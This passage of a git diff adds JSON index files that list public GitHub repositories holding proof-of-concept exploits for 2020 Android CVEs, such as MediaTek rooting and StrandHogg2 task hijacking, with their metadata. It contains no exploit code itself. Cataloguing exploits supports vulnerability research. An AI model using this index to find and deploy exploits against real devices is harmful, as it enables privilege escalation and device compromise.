4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0069.json b/2020/CVE-2020-0069.json new file mode 100644 index 0000000000..2067fd457c --- /dev/null +++ b/2020/CVE-2020-0069.json @@ -0,0 +1,166 @@ +[ + { + "id": 206786526, + "name": "AutomatedRoot", + "full_name": "R0rt1z2\/AutomatedRoot", + "owner": { + "login": "R0rt1z2", + "id": 39171306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39171306?v=4", + "html_url": "https:\/\/github.com\/R0rt1z2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R0rt1z2\/AutomatedRoot", + "description": "Root your MediaTek device with CVE-2020-0069", + "fork": false, + "created_at": "2019-09-06T12:12:48Z", + "updated_at": "2024-11-20T17:10:21Z", + "pushed_at": "2023-02-06T19:18:56Z", + "stargazers_count": 151, + "watchers_count": 151, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve-2020-0069", + "mediatek", + "mtk-su" + ], + "visibility": "public", + "forks": 24, + "watchers": 151, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 244758802, + "name": "mtk-su-reverse-cve-2020-0069", + "full_name": "TheRealJunior\/mtk-su-reverse-cve-2020-0069", + "owner": { + "login": "TheRealJunior", + "id": 8438895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8438895?v=4", + "html_url": "https:\/\/github.com\/TheRealJunior", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheRealJunior\/mtk-su-reverse-cve-2020-0069", + "description": "reversing mtk-su", + "fork": false, + "created_at": "2020-03-03T22:55:42Z", + "updated_at": "2024-08-12T19:58:21Z", + "pushed_at": "2020-03-04T22:32:03Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 16, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 245598253, + "name": "CVE-2020-0069", + "full_name": "yanglingxi1993\/CVE-2020-0069", + "owner": { + "login": "yanglingxi1993", + "id": 61902155, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61902155?v=4", + "html_url": "https:\/\/github.com\/yanglingxi1993", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanglingxi1993\/CVE-2020-0069", + "description": "simple poc for CVE-2020-0069", + "fork": false, + "created_at": "2020-03-07T08:50:48Z", + "updated_at": "2020-03-07T08:50:48Z", + "pushed_at": "2020-03-07T08:50:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 249711372, + "name": "CVE-2020-0069_poc", + "full_name": "quarkslab\/CVE-2020-0069_poc", + "owner": { + "login": "quarkslab", + "id": 3357711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3357711?v=4", + "html_url": "https:\/\/github.com\/quarkslab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quarkslab\/CVE-2020-0069_poc", + "description": null, + "fork": false, + "created_at": "2020-03-24T13:10:39Z", + "updated_at": "2024-11-10T18:38:30Z", + "pushed_at": "2020-03-24T13:19:34Z", + "stargazers_count": 99, + "watchers_count": 99, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "exploit", + "mediatek" + ], + "visibility": "public", + "forks": 26, + "watchers": 99, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 687139571, + "name": "mtk_su", + "full_name": "0xf15h\/mtk_su", + "owner": { + "login": "0xf15h", + "id": 46306147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46306147?v=4", + "html_url": "https:\/\/github.com\/0xf15h", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf15h\/mtk_su", + "description": "CVE-2020-0069", + "fork": false, + "created_at": "2023-09-04T17:52:04Z", + "updated_at": "2024-09-28T23:17:18Z", + "pushed_at": "2023-09-04T17:53:01Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0082.json b/2020/CVE-2020-0082.json new file mode 100644 index 0000000000..6aac350d69 --- /dev/null +++ b/2020/CVE-2020-0082.json @@ -0,0 +1,33 @@ +[ + { + "id": 341573053, + "name": "CVE-2020-0082-ExternalVibration", + "full_name": "0x742\/CVE-2020-0082-ExternalVibration", + "owner": { + "login": "0x742", + "id": 66528191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66528191?v=4", + "html_url": "https:\/\/github.com\/0x742", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x742\/CVE-2020-0082-ExternalVibration", + "description": "This repo contains a proof-of-concept for 📱🚀👑⚡, a deserialization vuln for local escalation of privilege to system_server in Android 10. This proof-of-concept only activates a privileged intent.", + "fork": false, + "created_at": "2021-02-23T14:00:55Z", + "updated_at": "2024-02-08T07:56:29Z", + "pushed_at": "2021-02-23T14:03:00Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0096.json b/2020/CVE-2020-0096.json new file mode 100644 index 0000000000..98bd35a9af --- /dev/null +++ b/2020/CVE-2020-0096.json @@ -0,0 +1,126 @@ +[ + { + "id": 269572904, + "name": "CVE-2020-0096", + "full_name": "wyu0hop\/CVE-2020-0096", + "owner": { + "login": "wyu0hop", + "id": 15089908, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15089908?v=4", + "html_url": "https:\/\/github.com\/wyu0hop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wyu0hop\/CVE-2020-0096", + "description": null, + "fork": false, + "created_at": "2020-06-05T08:26:27Z", + "updated_at": "2020-06-05T08:26:27Z", + "pushed_at": "2020-06-05T08:26:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 274319216, + "name": "StrandHogg2", + "full_name": "liuyun201990\/StrandHogg2", + "owner": { + "login": "liuyun201990", + "id": 40453145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40453145?v=4", + "html_url": "https:\/\/github.com\/liuyun201990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liuyun201990\/StrandHogg2", + "description": "PoC of StrandHogg2 (CVE-2020-0096)", + "fork": false, + "created_at": "2020-06-23T05:43:15Z", + "updated_at": "2023-09-12T09:48:36Z", + "pushed_at": "2020-06-18T09:05:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 293495207, + "name": "CVE-2020-0096-StrandHogg2", + "full_name": "tea9\/CVE-2020-0096-StrandHogg2", + "owner": { + "login": "tea9", + "id": 39117901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39117901?v=4", + "html_url": "https:\/\/github.com\/tea9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tea9\/CVE-2020-0096-StrandHogg2", + "description": "CVE-2020-0096-StrandHogg2 复现", + "fork": false, + "created_at": "2020-09-07T10:25:25Z", + "updated_at": "2024-11-06T08:34:47Z", + "pushed_at": "2021-03-15T11:14:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 761975358, + "name": "CVE-2020-0096-strandhogg-exploit-p0c", + "full_name": "nahid0x1\/CVE-2020-0096-strandhogg-exploit-p0c", + "owner": { + "login": "nahid0x1", + "id": 76641588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76641588?v=4", + "html_url": "https:\/\/github.com\/nahid0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nahid0x1\/CVE-2020-0096-strandhogg-exploit-p0c", + "description": "Android Application Task Hijacking Aka Strandhogg Attack Exploit", + "fork": false, + "created_at": "2024-02-22T20:55:46Z", + "updated_at": "2024-02-22T20:57:11Z", + "pushed_at": "2024-02-22T20:58:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0108.json b/2020/CVE-2020-0108.json new file mode 100644 index 0000000000..b087deaf4e --- /dev/null +++ b/2020/CVE-2020-0108.json @@ -0,0 +1,33 @@ +[ + { + "id": 285182790, + "name": "ServiceCheater", + "full_name": "CrackerCat\/ServiceCheater", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/ServiceCheater", + "description": "PoC of CVE-2020-0108", + "fork": false, + "created_at": "2020-08-05T04:50:42Z", + "updated_at": "2024-05-13T03:12:39Z", + "pushed_at": "2020-08-05T02:55:34Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0113.json b/2020/CVE-2020-0113.json new file mode 100644 index 0000000000..404d91ac49 --- /dev/null +++ b/2020/CVE-2020-0113.json @@ -0,0 +1,36 @@ +[ + { + "id": 319039566, + "name": "ServiceCheater", + "full_name": "XDo0\/ServiceCheater", + "owner": { + "login": "XDo0", + "id": 30046447, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30046447?v=4", + "html_url": "https:\/\/github.com\/XDo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XDo0\/ServiceCheater", + "description": "Poc of CVE-2020-0113 & CVE-2020-0108", + "fork": false, + "created_at": "2020-12-06T13:27:33Z", + "updated_at": "2021-04-03T14:41:27Z", + "pushed_at": "2020-12-10T06:15:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0114.json b/2020/CVE-2020-0114.json new file mode 100644 index 0000000000..5e52c8ad57 --- /dev/null +++ b/2020/CVE-2020-0114.json @@ -0,0 +1,33 @@ +[ + { + "id": 293716653, + "name": "CVE-2020-0114-systemui", + "full_name": "tea9\/CVE-2020-0114-systemui", + "owner": { + "login": "tea9", + "id": 39117901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39117901?v=4", + "html_url": "https:\/\/github.com\/tea9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tea9\/CVE-2020-0114-systemui", + "description": null, + "fork": false, + "created_at": "2020-09-08T06:06:36Z", + "updated_at": "2024-06-08T16:40:10Z", + "pushed_at": "2020-09-08T06:09:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0121.json b/2020/CVE-2020-0121.json new file mode 100644 index 0000000000..ed9a20b123 --- /dev/null +++ b/2020/CVE-2020-0121.json @@ -0,0 +1,33 @@ +[ + { + "id": 275476383, + "name": "CVE-2020-0121", + "full_name": "mooneee\/CVE-2020-0121", + "owner": { + "login": "mooneee", + "id": 58715815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58715815?v=4", + "html_url": "https:\/\/github.com\/mooneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mooneee\/CVE-2020-0121", + "description": null, + "fork": false, + "created_at": "2020-06-28T00:26:58Z", + "updated_at": "2020-06-28T15:22:04Z", + "pushed_at": "2020-06-28T00:30:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0136.json b/2020/CVE-2020-0136.json new file mode 100644 index 0000000000..1466b2baee --- /dev/null +++ b/2020/CVE-2020-0136.json @@ -0,0 +1,33 @@ +[ + { + "id": 511398155, + "name": "libhwbinder_AOSP10_r33_CVE-2020-0136", + "full_name": "Satheesh575555\/libhwbinder_AOSP10_r33_CVE-2020-0136", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/libhwbinder_AOSP10_r33_CVE-2020-0136", + "description": null, + "fork": false, + "created_at": "2022-07-07T05:42:42Z", + "updated_at": "2022-07-07T05:44:21Z", + "pushed_at": "2022-07-07T05:44:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0137.json b/2020/CVE-2020-0137.json new file mode 100644 index 0000000000..3a8fa27a1e --- /dev/null +++ b/2020/CVE-2020-0137.json @@ -0,0 +1,64 @@ +[ + { + "id": 484673073, + "name": "framework_base_AOSP10_r33_CVE-2020-0137", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2020-0137", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2020-0137", + "description": null, + "fork": false, + "created_at": "2022-04-23T07:02:41Z", + "updated_at": "2022-04-23T07:23:26Z", + "pushed_at": "2022-04-23T07:22:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 516352324, + "name": "frameworks_base_AOSP10_r33_CVE-2020-0137", + "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2020-0137", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2020-0137", + "description": null, + "fork": false, + "created_at": "2022-07-21T11:57:43Z", + "updated_at": "2022-07-21T12:03:50Z", + "pushed_at": "2022-07-21T12:04:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0138.json b/2020/CVE-2020-0138.json new file mode 100644 index 0000000000..4b43fd1121 --- /dev/null +++ b/2020/CVE-2020-0138.json @@ -0,0 +1,33 @@ +[ + { + "id": 480318740, + "name": "system_bt_AOSP10_r33-CVE-2020-0138", + "full_name": "Satheesh575555\/system_bt_AOSP10_r33-CVE-2020-0138", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP10_r33-CVE-2020-0138", + "description": null, + "fork": false, + "created_at": "2022-04-11T09:48:51Z", + "updated_at": "2023-08-29T13:22:08Z", + "pushed_at": "2022-04-11T09:51:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0155.json b/2020/CVE-2020-0155.json new file mode 100644 index 0000000000..7dd9592725 --- /dev/null +++ b/2020/CVE-2020-0155.json @@ -0,0 +1,33 @@ +[ + { + "id": 486863266, + "name": "hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155", + "full_name": "Trinadh465\/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155", + "description": null, + "fork": false, + "created_at": "2022-04-29T06:33:54Z", + "updated_at": "2022-04-29T06:37:39Z", + "pushed_at": "2022-04-29T06:38:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0160.json b/2020/CVE-2020-0160.json new file mode 100644 index 0000000000..95cd39a1d4 --- /dev/null +++ b/2020/CVE-2020-0160.json @@ -0,0 +1,33 @@ +[ + { + "id": 483990689, + "name": "frameworks_av_AOSP10_r33_CVE-2020-0160", + "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2020-0160", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2020-0160", + "description": null, + "fork": false, + "created_at": "2022-04-21T09:36:45Z", + "updated_at": "2022-04-21T09:44:14Z", + "pushed_at": "2022-04-21T09:45:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0181.json b/2020/CVE-2020-0181.json new file mode 100644 index 0000000000..1793d967f0 --- /dev/null +++ b/2020/CVE-2020-0181.json @@ -0,0 +1,33 @@ +[ + { + "id": 486847681, + "name": "external_libexif_AOSP10_r33_CVE-2020-0181", + "full_name": "Trinadh465\/external_libexif_AOSP10_r33_CVE-2020-0181", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_libexif_AOSP10_r33_CVE-2020-0181", + "description": null, + "fork": false, + "created_at": "2022-04-29T05:24:12Z", + "updated_at": "2022-04-29T05:29:00Z", + "pushed_at": "2022-04-29T05:29:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0183.json b/2020/CVE-2020-0183.json new file mode 100644 index 0000000000..0165480457 --- /dev/null +++ b/2020/CVE-2020-0183.json @@ -0,0 +1,64 @@ +[ + { + "id": 484307022, + "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183", + "full_name": "nanopathi\/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183", + "description": null, + "fork": false, + "created_at": "2022-04-22T05:28:45Z", + "updated_at": "2022-04-22T05:34:14Z", + "pushed_at": "2022-04-22T05:34:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623423251, + "name": "platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183", + "full_name": "hshivhare67\/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183", + "description": null, + "fork": false, + "created_at": "2023-04-04T10:46:05Z", + "updated_at": "2023-04-04T10:48:29Z", + "pushed_at": "2023-04-04T10:50:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0188.json b/2020/CVE-2020-0188.json new file mode 100644 index 0000000000..2da9ed07e0 --- /dev/null +++ b/2020/CVE-2020-0188.json @@ -0,0 +1,95 @@ +[ + { + "id": 480799748, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2020-0188", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2020-0188", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2020-0188", + "description": null, + "fork": false, + "created_at": "2022-04-12T12:25:22Z", + "updated_at": "2023-03-27T01:14:05Z", + "pushed_at": "2022-04-12T12:28:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484390611, + "name": "ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188", + "full_name": "ShaikUsaf\/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188", + "description": null, + "fork": false, + "created_at": "2022-04-22T10:24:13Z", + "updated_at": "2022-04-22T10:27:10Z", + "pushed_at": "2022-04-22T10:27:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496175736, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219", + "description": null, + "fork": false, + "created_at": "2022-05-25T10:01:58Z", + "updated_at": "2023-03-27T01:14:13Z", + "pushed_at": "2022-05-25T10:05:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0198.json b/2020/CVE-2020-0198.json new file mode 100644 index 0000000000..df8e29c4e3 --- /dev/null +++ b/2020/CVE-2020-0198.json @@ -0,0 +1,33 @@ +[ + { + "id": 486857132, + "name": "external_libexif_AOSP10_r33_CVE-2020-0198", + "full_name": "Trinadh465\/external_libexif_AOSP10_r33_CVE-2020-0198", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_libexif_AOSP10_r33_CVE-2020-0198", + "description": null, + "fork": false, + "created_at": "2022-04-29T06:08:29Z", + "updated_at": "2022-04-29T06:10:40Z", + "pushed_at": "2022-04-29T06:11:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-0201.json b/2020/CVE-2020-0201.json new file mode 100644 index 0000000000..582b39cb77 --- /dev/null +++ b/2020/CVE-2020-0201.json @@ -0,0 +1,64 @@ +[ + { + "id": 710491787, + "name": "Packages_app_settings_CVE-2020-0201", + "full_name": "uthrasri\/Packages_app_settings_CVE-2020-0201", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/Packages_app_settings_CVE-2020-0201", + "description": null, + "fork": false, + "created_at": "2023-10-26T20:01:07Z", + "updated_at": "2024-07-29T10:51:42Z", + "pushed_at": "2024-07-29T10:51:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816647824, + "name": "packages_apps_Settings_CVE-2020-0201", + "full_name": "Trinadh465\/packages_apps_Settings_CVE-2020-0201", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_CVE-2020-0201", + "description": null, + "fork": false, + "created_at": "2024-06-18T06:36:13Z", + "updated_at": "2024-06-18T06:39:16Z", + "pushed_at": "2024-06-18T06:39:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git 